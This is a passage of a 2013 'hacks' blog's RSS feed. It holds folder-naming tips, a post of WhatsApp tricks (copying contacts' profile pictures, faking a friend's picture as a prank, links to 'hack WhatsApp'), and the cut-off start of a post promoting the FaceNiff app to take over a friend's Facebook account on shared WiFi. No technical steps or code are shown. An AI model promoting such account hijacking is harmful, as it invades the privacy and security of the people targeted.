src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb5aAjnusNRzp5g2nptS2cH3iQlJMxJQEAqFbsmPsK-HnpbTU2JhsZMk51wMVe7u8dMdi-Rp4n4dzlnedM00RDQZwwZsBWOU5jId2ryajMc4FiIcXHGdnVX_GouATi8EU-vH7G6qUamTjx/s1600/invisible.png" height="179" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&amp;nbsp;Now you just create a wihout name folder.&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Second Trick &lt;/h3&gt;&lt;ul&gt;&lt;li&gt;You create a folder and rename it and hold down Alt key and press 0160 (numlock on)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Color&amp;nbsp; your Folder&lt;/h2&gt;You can create your color folder wih this software&amp;nbsp; &lt;a href="http://softorino.com/deploy/FolderColorizerSetup.exe" target="_blank"&gt;Folder Colorizer&lt;/a&gt;&lt;br /&gt;&lt;h2&gt;&lt;a href="http://softorino.com/deploy/FolderColorizerSetup.exe" target="_blank"&gt;Download&lt;/a&gt;&lt;/h2&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibu-xGRQxnPqpYUI5dA5nonfHfoEkzevwyV0dp7q6aSbQD__EfZ2Watb05qyB0CJ9G-QuSE2_gHypPOO9zSp9O-xyiI7xFsVCQ35D0wC7GwVnLeKyRsPNttDFBaBsQHVppc75w_3_3og-O/s1600/color+folder.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibu-xGRQxnPqpYUI5dA5nonfHfoEkzevwyV0dp7q6aSbQD__EfZ2Watb05qyB0CJ9G-QuSE2_gHypPOO9zSp9O-xyiI7xFsVCQ35D0wC7GwVnLeKyRsPNttDFBaBsQHVppc75w_3_3og-O/s1600/color+folder.png" height="179" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;Thanks&lt;br /&gt;&lt;h2&gt;&amp;nbsp;&lt;/h2&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYppnjDRZImhDPxjEd2tA1k4MnxygNR8mtWkWORYoruBxdctkuvNg9-RSWqXNA8ccDGQweqzPVLP6ouxXIkTkU5PP_Jh2vZ8ckjfzi-vadX6b44eWGwJp8S8JLrgZVqfUZs9pR1z6ESx9t/s72-c/charmap.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>WhatsApp Tricks and Hacks </title><link>http://bambahacks.blogspot.com/2013/11/4-whatsapp-tricks-and-hacks-android.html</link><category>Android</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Fri, 15 Nov 2013 09:30:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-1191908492150534858</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&amp;nbsp;&lt;a href="http://www.whatsapp.com/" rel="nofollow" target="_blank"&gt;WhatsApp Messenger&lt;/a&gt; is a cross-platform mobile messaging app which allows  you to exchange messages without having to pay for SMS. &lt;a href="http://www.whatsapp.com/" rel="nofollow" target="_blank"&gt;WhatsApp Messenger&lt;/a&gt; is available for iPhone, BlackBerry, Android, Windows Phone  and Nokia and yes, those phones can all message each other! Because  &lt;a href="http://www.whatsapp.com/" rel="nofollow" target="_blank"&gt;WhatsApp Messenger&lt;/a&gt; uses the same internet data plan that you use for  email and web browsing, there is no cost to message and stay in touch  with your friends.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://www.blogger.com/blogger.g?blogID=4670434626441035720" name="more"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Without wasting much of the time, Let me Start with my topic :&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;h2&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif; font-size: medium;"&gt;1. Whatsapp Image Trick (Change Image) with &lt;a href="https://play.google.com/store/apps/details?id=com.magiapp&amp;amp;hl=en" rel="nofollow" target="_blank"&gt;Magiapp&lt;/a&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeEHjtdPMWE47NurvoaKce-9n_UdFAHKlE7aoEQehulRuENACPpfoyl-r_fm9jMkJtXlAJmeMqbYWn5f4kw2lR955xT9QBxS_637wNYxDSRf3m4YFeHIPqfB2jvPQOkTdrRQ9UEWFX-EA/s1600/adfaf.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeEHjtdPMWE47NurvoaKce-9n_UdFAHKlE7aoEQehulRuENACPpfoyl-r_fm9jMkJtXlAJmeMqbYWn5f4kw2lR955xT9QBxS_637wNYxDSRf3m4YFeHIPqfB2jvPQOkTdrRQ9UEWFX-EA/s1600/adfaf.jpg" height="166" width="200" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;Image hide which is one of the most popular. Users can Hide image inside another image using android Application name "&lt;a href="https://play.google.com/store/apps/details?id=com.magiapp&amp;amp;hl=en" rel="nofollow" target="_blank"&gt;Magiapp&lt;/a&gt;"&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;Using this app you can send Picture in another picture in whatsapp only. below picture describe you all &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;This application is available only for  Android user there is no alternative available for Windows and Apple  Store (If you know let us know by below comment section).&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgss63geQ-rUqp6a3VvpeGFODsPul_AiaL06ESjg1RNrt3tRaYIaE8k_OqOJvubaXNlftIu2hViVKamrYhy6L1iyG3YgSt28G6VS-11W84rwEMj_97DLS90wE2U5N0d6YF-JwB-KtUOwM4/s1600/magiapp.jpg" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgss63geQ-rUqp6a3VvpeGFODsPul_AiaL06ESjg1RNrt3tRaYIaE8k_OqOJvubaXNlftIu2hViVKamrYhy6L1iyG3YgSt28G6VS-11W84rwEMj_97DLS90wE2U5N0d6YF-JwB-KtUOwM4/s1600/magiapp.jpg" height="160" width="200" /&gt;&lt;/a&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRzyWOu-djvkAPQEFXFdP4ZL0BWBqxr91y0xCFcdzcREaRfNGxrH3Q3YSaNYayDDpH87yj2Sv_1gFNtqh24ml1q2i0C0PXqSSbvYRoRGozDVDSk7nRCTjZn-d98VUk7dBt53pWQUWdVu0/s1600/id-38429-trucos12.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRzyWOu-djvkAPQEFXFdP4ZL0BWBqxr91y0xCFcdzcREaRfNGxrH3Q3YSaNYayDDpH87yj2Sv_1gFNtqh24ml1q2i0C0PXqSSbvYRoRGozDVDSk7nRCTjZn-d98VUk7dBt53pWQUWdVu0/s1600/id-38429-trucos12.jpg" height="200" width="133" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;h2&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif; font-size: medium;"&gt;2. Sniff Profile Pictures of your Friends&lt;/span&gt;&lt;/h2&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWbagBC5V8Sp7XDX92c6vqsv3QZCuKHBYJccUtvULoUMgP5Z9ZjWOVWgrD_HmDmXFAYcp_eZGQJNCbHvPyW5tdWmJqdUJaFWtda_UpU4L8rWov1zy9tnkWkxhwojdaajuQNdt8z8XBE_8/s1600/SC20121226-195730.png" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWbagBC5V8Sp7XDX92c6vqsv3QZCuKHBYJccUtvULoUMgP5Z9ZjWOVWgrD_HmDmXFAYcp_eZGQJNCbHvPyW5tdWmJqdUJaFWtda_UpU4L8rWov1zy9tnkWkxhwojdaajuQNdt8z8XBE_8/s1600/SC20121226-195730.png" height="200" width="150" /&gt;&lt;/a&gt;&lt;span style="font-size: x-small;"&gt;Being for privacy reason WhatsApp does not allows you to download Pictures of your WhatsApp Contacts. But the truth is that it automatically downloads the pictures when you view them once.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt; &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;the pictures you view is saved in /sdcard/WhatsApp/Profile Pictures and the image name of picture is contact number of your WhatsApp Contact.well if you want to download that picture you have to just copy that image to somewhere other directory like /sdcard/AnyOtherFolder .&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;h3&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif; font-size: medium;"&gt;3. Change Friends Profile Picture.&lt;/span&gt;&lt;/h3&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;It is possible to change the Profile Picture of your Friend and shock them, this trick is related to&amp;nbsp; 2nd trick.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;Let's Get Started:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;Step 1. Choose a good picture for your friend and download it.for instance it will take troll face. &amp;nbsp; &lt;/span&gt;&lt;/span&gt;&amp;nbsp; &amp;nbsp; &lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7HK43TwUJt9BQM34cm8CmfHMFq-zRWef0h2xn_StMfnHFcsaIprAUbLMFDygaREq90gziBcN99tOdYH8vY6O7kMcKn6TYdoZo16BmY520GNFxOXEMF_bkOEPvadngpmQMnRydHhYFlCE/s1600/1287666826226.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7HK43TwUJt9BQM34cm8CmfHMFq-zRWef0h2xn_StMfnHFcsaIprAUbLMFDygaREq90gziBcN99tOdYH8vY6O7kMcKn6TYdoZo16BmY520GNFxOXEMF_bkOEPvadngpmQMnRydHhYFlCE/s1600/1287666826226.png" height="182" width="200" /&gt;&amp;nbsp;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&amp;nbsp;Step 2. Now Rename the Image with your Friends Mobile Number. For example , i will change it to 91800375**** of my friend Milan&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Step 3. Resize the image to 561 * 561 using paint by following these steps:&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;- Right Click the image and "Open With"&amp;gt;Paint&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;- Press Ctrl + W and check "by Pixels"&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;- Set the values to 561 Height and 561 Width&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;- Ctrl + S to Save it.&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigwfqp9ZTxOBsDe2q2aJ80OBCG0TTRTcOkSxGceiOfXPeqh7s_KhVyovwMl6PpTOwKR38LQ-CHBwrTf060MIP3fZbc_s3BOK23lrGUEukdkAXfm0rrECQdCifmB1f74LPJeih3bk2H53o/s1600/SC20121226-202027.png" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigwfqp9ZTxOBsDe2q2aJ80OBCG0TTRTcOkSxGceiOfXPeqh7s_KhVyovwMl6PpTOwKR38LQ-CHBwrTf060MIP3fZbc_s3BOK23lrGUEukdkAXfm0rrECQdCifmB1f74LPJeih3bk2H53o/s1600/SC20121226-202027.png" height="200" width="150" /&gt;&lt;/a&gt;Step 4. Just save the image into your device on certain path "&lt;span style="font-size: x-small;"&gt;/sdcard/WhatsApp/Profile Pictures&lt;/span&gt;&lt;/span&gt;".&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6W2vvIAXBgAzL1y7wIikqQyDHet2zfr7wCuskSmhQymKZmDC4wdQ4JgteyX6UBvu0wRzEjrIzs3-53FxDgdG6TyrEQplm12zdFJFeLA8gbwDXp-Oiu8iP64UEuLtP94MM7BpYJ8VHOf8/s1600/SC20121226-201909.png" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6W2vvIAXBgAzL1y7wIikqQyDHet2zfr7wCuskSmhQymKZmDC4wdQ4JgteyX6UBvu0wRzEjrIzs3-53FxDgdG6TyrEQplm12zdFJFeLA8gbwDXp-Oiu8iP64UEuLtP94MM7BpYJ8VHOf8/s1600/SC20121226-201909.png" height="200" width="150" /&gt;&lt;/a&gt;Step  5. Turn of Wifi or Deactivate data network for a while.(till you prank  your friend). as his real profile picture will not Download then.&lt;/span&gt;&lt;/div&gt;
&lt;div class="" style="clear: both; text-align: justify;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj57VQRMY4CB_AjU2igJemPdlT-fd5jufnZlAQF-cKEpLYJkCjTgsp6_12gD1OYY-46CXh0V_cJZlpKAehT_mlAo79jHHXCy9yVeyHJDmSEEj0Pt_ZavbBG6W84WSXWvfekxu1-egzUS3k/s1600/SC20121226-202646.png" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj57VQRMY4CB_AjU2igJemPdlT-fd5jufnZlAQF-cKEpLYJkCjTgsp6_12gD1OYY-46CXh0V_cJZlpKAehT_mlAo79jHHXCy9yVeyHJDmSEEj0Pt_ZavbBG6W84WSXWvfekxu1-egzUS3k/s1600/SC20121226-202646.png" height="200" width="150" /&gt;&lt;/a&gt;Step 6: Show and Appreciate him for his new profile picture by showing him or by &lt;a href="http://www.makeuseof.com/tag/6-ways-to-take-screenshots-on-android/" rel="nofollow" target="_blank"&gt;taking screenshot of your device screen&lt;/a&gt;. &lt;/span&gt;&lt;/div&gt;
&lt;div class="" style="clear: both; text-align: justify;"&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h2&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif; font-size: medium;"&gt;4. Use Fancy Text in-between your conversation&lt;/span&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif; font-size: medium;"&gt;s&lt;/span&gt;&lt;/h2&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;are you  bored with the normal text chat and try something new. then i am sure  you would like this. for this trick you have to download small  application in your device "&lt;a href="https://play.google.com/store/apps/details?id=in.webrilliance.fancytextgenerator" rel="nofollow" target="_blank"&gt;Fancy Text Generator&lt;/a&gt;".&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;There are total 18 different Styles you can choose from.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOFI7Vox3sn4zIcQqsSPhoW5MU7avGouCdxMKxUSDL9UyAE_rm09nOuY5V3fqAXA95jQctLMwhrmVcf7xn70DxnBSLC9PXxwGriQkRyFYEQhs9De88zs3N-_PZyn3t9nQ0VuvseBvDtHg/s1600/SC20121230-110423.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOFI7Vox3sn4zIcQqsSPhoW5MU7avGouCdxMKxUSDL9UyAE_rm09nOuY5V3fqAXA95jQctLMwhrmVcf7xn70DxnBSLC9PXxwGriQkRyFYEQhs9De88zs3N-_PZyn3t9nQ0VuvseBvDtHg/s200/SC20121230-110423.png" height="200" width="150" /&gt;&lt;/a&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFPZ0asDVx4eKd1U6xLO2ozo5L8oRFL9INmn0gldCXlGhDsurwO71oZkwP1Uw5vBCnAINaLWg4Q-sj42xPSVGs7ofSCAq7AmSTvoVHug8Uw_jobAXwRzDdV5DSVz1gWTF2V12aye1rq7k/s1600/SC20121230-110040.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFPZ0asDVx4eKd1U6xLO2ozo5L8oRFL9INmn0gldCXlGhDsurwO71oZkwP1Uw5vBCnAINaLWg4Q-sj42xPSVGs7ofSCAq7AmSTvoVHug8Uw_jobAXwRzDdV5DSVz1gWTF2V12aye1rq7k/s320/SC20121230-110040.bmp" height="208" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;and the best part of this trick is you can change your WhatsApp statuses, name of Groups and communicate in fancy text!&lt;/span&gt;&lt;/div&gt;
&lt;div id="bpslidein_place_holder"&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt; &lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif; font-size: medium;"&gt;More Tricks and Hacks.&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif; font-size: medium;"&gt;5. Lock Your WhatsApp&lt;/span&gt;&lt;/h2&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Get complete privacy and security of your Whats App with Pattern Messenger Lock. &lt;br /&gt;Afraid that anyone can access WhatsApp on your phone and see your private conversations?&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWp5lL5g08WL7U21Mexhu1nnGFiVqiLlQGsE3VGzSMa-bAt8cztrCJQQXxaKF3rGN9pgwPNs8q2i2gzjuaIWJXtY5JQ9TaDrKnvSuLcrIfkD9J8ff_JdBPTulSKcXrW6SvfqyBaQi1w_A/s1600/SC20130424-075019.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="Lock Your Whatsapp" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWp5lL5g08WL7U21Mexhu1nnGFiVqiLlQGsE3VGzSMa-bAt8cztrCJQQXxaKF3rGN9pgwPNs8q2i2gzjuaIWJXtY5JQ9TaDrKnvSuLcrIfkD9J8ff_JdBPTulSKcXrW6SvfqyBaQi1w_A/s1600/SC20130424-075019.png" title="Lock Your Whatsapp" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;Messenger Lock is the solution. Messenger Lock gives a Pattern lock security for your WhatsApp messenger. &lt;br /&gt;The WhatsApp can only be accessible if you enter the pattern password correctly. &lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;If  you have naughty friends who like to send messages to other on your  behalf from whatsapp, install Messenger Lock. It will still let them use  the rest of the phone but block whatsapp from them.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Just Go and Download &lt;a href="https://play.google.com/store/apps/details?id=com.thebes.lockforwhatsappfree" rel="nofollow" target="_blank"&gt;This Application&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-size: medium;"&gt;6. &lt;a href="http://goh4x.blogspot.in/2013/05/Hide-Last-Seen-Stamp-On-Your-WhatsApp-Free.html" rel="nofollow" target="_blank"&gt;Hide Last Seen Stamp From WhatsApp&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&amp;nbsp; &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Wanna Hack WhatsApp? &lt;a href="http://goh4x.blogspot.in/2013/04/3-ways-to-hack-whatsapp.html" rel="nofollow"&gt;3 Ways to Hack WhatsApp&lt;/a&gt; are waiting for you.&amp;nbsp;&lt;/span&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="http://goh4x.blogspot.in/2013/04/how-to-display-song-lyrics-on-android-windows-mac-os.html" rel="nofollow" target="_blank"&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Enjoy Trolling your friends out and Remember to comment below your Reactions!&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeEHjtdPMWE47NurvoaKce-9n_UdFAHKlE7aoEQehulRuENACPpfoyl-r_fm9jMkJtXlAJmeMqbYWn5f4kw2lR955xT9QBxS_637wNYxDSRf3m4YFeHIPqfB2jvPQOkTdrRQ9UEWFX-EA/s72-c/adfaf.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How to Hack Friends Facebook Account using Android (Faceniff) </title><link>http://bambahacks.blogspot.com/2013/11/how-to-hack-friends-facebook-account.html</link><category>Android</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Fri, 15 Nov 2013 09:27:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-3463819675302447194</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div dir="ltr" trbidi="on"&gt;
&lt;br /&gt;
&lt;a href="http://rightyaleft.com/wp-content/uploads/2011/09/hack-facebook-account-online.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img alt="" border="0" class="alignright size-full wp-image-813" src="http://rightyaleft.com/wp-content/uploads/2011/09/hack-facebook-account-online.jpg" height="159" title="hack-facebook-account-online" width="200" /&gt;&lt;/a&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Now a days hacking as such easy as making an Facebook account.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Today I am going to tell you about a method using which you can &lt;b&gt;hack a Facebook account of your friend who are working under same WiFi network with your android Phone&lt;/b&gt;. To do so you need to install a app named as FaceNiff. Using this app you can hack your friends facebook account easily.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a href="https://www.blogger.com/blogger.g?blogID=4670434626441035720" name="more"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;You can hack an account if both the Victim and the hacker will be in the same WiFi network.&lt;/span&gt;&lt;br /&gt;
